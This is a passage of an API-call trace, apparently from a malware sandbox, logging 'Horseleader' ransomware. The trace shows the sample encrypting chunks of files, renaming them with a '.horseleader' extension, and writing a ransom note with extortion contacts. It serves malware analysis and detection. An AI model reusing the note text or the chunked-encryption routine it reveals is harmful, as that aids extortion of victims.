lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.380] CloseHandle (hObject=0x1a4) returned 1 [0248.380] GetProcessHeap () returned 0x780000 [0248.380] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.380] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS.horseleader") returned 89 [0248.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its.horseleader")) returned 1 [0248.382] GetProcessHeap () returned 0x780000 [0248.382] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.382] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c79400, ftCreationTime.dwHighDateTime=0x1be6f42, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8c79400, ftLastWriteTime.dwHighDateTime=0x1be6f42, nFileSizeHigh=0x0, nFileSizeLow=0xa5c00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61ES.LEX", cAlternateFileName="")) returned 1 [0248.382] lstrcmpiW (lpString1="WT61ES.LEX", lpString2="Windows") returned 1 [0248.382] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 [0248.382] StrStrIW (lpFirst="WT61ES.LEX", lpSrch=".horseleader") returned 0x0 [0248.382] lstrcmpW (lpString1="WT61ES.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.382] lstrcmpW (lpString1="WT61ES.LEX", lpString2="_uninstalling_.png") returned 1 [0248.382] lstrlenW (lpString=".testttjffg") returned 11 [0248.382] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX", lpSrch=".testttjffg") returned 0x0 [0248.382] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.382] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX") returned 75 
[0248.383] StrStrW (lpFirst="WT61ES.LEX", lpSrch=".txt") returned 0x0 [0248.383] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=678912) returned 1 [0248.383] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.383] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.389] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.389] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x50600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.390] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.393] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.393] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.394] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa0c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.394] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.421] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.421] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.421] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.422] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.422] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.422] CloseHandle (hObject=0x1a4) returned 1 [0248.422] GetProcessHeap () returned 0x780000 [0248.422] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.422] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX.horseleader") returned 87 [0248.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\WT61ES.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\wt61es.lex.horseleader")) 
returned 1 [0248.426] GetProcessHeap () returned 0x780000 [0248.426] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.426] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c79400, ftCreationTime.dwHighDateTime=0x1be6f42, ftLastAccessTime.dwLowDateTime=0x5ba5ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8c79400, ftLastWriteTime.dwHighDateTime=0x1be6f42, nFileSizeHigh=0x0, nFileSizeLow=0xa5c00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61ES.LEX", cAlternateFileName="")) returned 0 [0248.426] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.426] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\#Decrypt#.txt") returned 78 [0248.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.427] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.427] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.428] lstrlenA (lpString="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") returned 1368 [0248.428] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.428] CloseHandle (hObject=0x158) returned 1 [0248.428] GetProcessHeap () returned 0x780000 [0248.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.428] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FRAR", cAlternateFileName="")) returned 1 [0248.429] lstrcmpiW (lpString1="FRAR", lpString2="Windows") returned -1 [0248.429] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned 64 [0248.429] lstrcmpW (lpString1="FRAR", lpString2=".") returned 1 [0248.429] lstrcmpW (lpString1="FRAR", lpString2="..") returned 1 [0248.429] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.429] GetProcessHeap () returned 0x780000 [0248.429] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0248.429] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*") returned 66 [0248.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.430] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\.") returned 66 [0248.430] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.430] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.430] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\..") returned 67 [0248.430] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.430] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0248.430] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21282c00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21282c00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x166bae, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FRAR.ITS", cAlternateFileName="")) returned 1 [0248.430] lstrcmpiW (lpString1="MSB1FRAR.ITS", lpString2="Windows") returned -1 [0248.430] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0248.431] StrStrIW (lpFirst="MSB1FRAR.ITS", lpSrch=".horseleader") returned 0x0 [0248.431] lstrcmpW (lpString1="MSB1FRAR.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.431] lstrcmpW (lpString1="MSB1FRAR.ITS", lpString2="_uninstalling_.png") returned 1 [0248.431] lstrlenW (lpString=".testttjffg") returned 11 [0248.431] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS", lpSrch=".testttjffg") returned 0x0 [0248.431] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.431] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.431] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 
[0248.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0248.432] StrStrW (lpFirst="MSB1FRAR.ITS", lpSrch=".txt") returned 0x0 [0248.432] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1469358) returned 1 [0248.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.432] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.434] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.435] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.436] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb0dd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.436] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.438] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.438] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.439] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x161bae, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.439] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.441] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.442] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.442] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.442] CloseHandle (hObject=0x1a4) returned 1 [0248.442] GetProcessHeap () returned 0x780000 [0248.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.443] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.horseleader") returned 89 [0248.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\msb1frar.its.horseleader")) returned 1 [0248.444] GetProcessHeap () returned 0x780000 [0248.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.444] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21282c00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21282c00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x166bae, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FRAR.ITS", cAlternateFileName="")) returned 0 [0248.444] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.444] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\#Decrypt#.txt") returned 78 [0248.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\frar\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.445] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.445] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.446] lstrlenA (lpString="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") returned 1368 [0248.446] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.447] CloseHandle (hObject=0x158) returned 1 [0248.447] GetProcessHeap () returned 0x780000 [0248.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.447] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FREN", cAlternateFileName="")) returned 1 [0248.447] lstrcmpiW (lpString1="FREN", lpString2="Windows") returned -1 [0248.447] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned 64 [0248.447] lstrcmpW (lpString1="FREN", lpString2=".") returned 1 [0248.447] lstrcmpW (lpString1="FREN", lpString2="..") returned 1 [0248.447] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.447] GetProcessHeap () returned 0x780000 [0248.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
